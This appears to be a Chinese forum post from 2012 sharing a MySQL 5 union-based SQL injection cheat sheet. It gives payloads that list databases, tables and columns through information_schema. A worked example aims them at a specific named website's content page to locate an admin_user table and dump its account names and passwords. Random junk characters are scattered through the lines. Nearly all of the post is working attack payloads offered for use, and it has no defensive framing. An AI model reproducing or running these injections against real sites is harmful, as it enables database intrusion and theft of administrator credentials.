查库
9 U) ^. `% ~) E8 q. r8 }. A; y' t8 E9 b! @5 ]2 V
id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/* `+ |) b) d1 Y
' ?( T" }+ e3 L; Z% M$ ?9 z7 @7 x查表' O* [9 _. q, i+ J
6 w9 j* T) u$ k$ Z" w3 D& i3 ~1 d" q
id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1* j$ |$ V% U6 G1 F% }; T
% Y! k8 ~% w) b3 O O
查段
9 `+ `8 v; r# M" }1 ?$ U
! O2 J, F7 E% _( v( H: ]id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,13 u5 A9 A$ ?% ]) ^
; X( L3 [8 I. o/ X8 i8 W2 v% {$ p
mysql5高级注入方法暴表
7 g7 }# E8 r: p3 n$ w! W1 Q
3 E& a+ B1 F8 u, r& e, B- [例子如下:
6 j6 C G6 B& m9 B8 H0 C, ^' N, r0 v j) J- `
1.爆表$ p4 F5 h8 V8 ?& D) k' o
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)
: C* K. l# m8 y这样爆到第4个时出现了admin_user表。, J+ |8 J v# j' T2 I
$ i! C/ n# H( I, Q, r* I
2.暴字段* M9 z, w, b( L6 J9 q: ~% t; f/ k
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*
$ U3 h- c! S& b
" ?3 F: G5 ~8 f8 V0 Y0 U) O6 P% p5 g$ ~' J
3.爆密码
& L( g0 n6 X- whttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
& `1 f: y8 K. O) j: N, d
' _! f6 V* c4 R2 |6 ?; F# M+ ^) f4 L W5 I/ w/ T
|
发表于 2012-9-13 16:29:37
收藏
支持
反对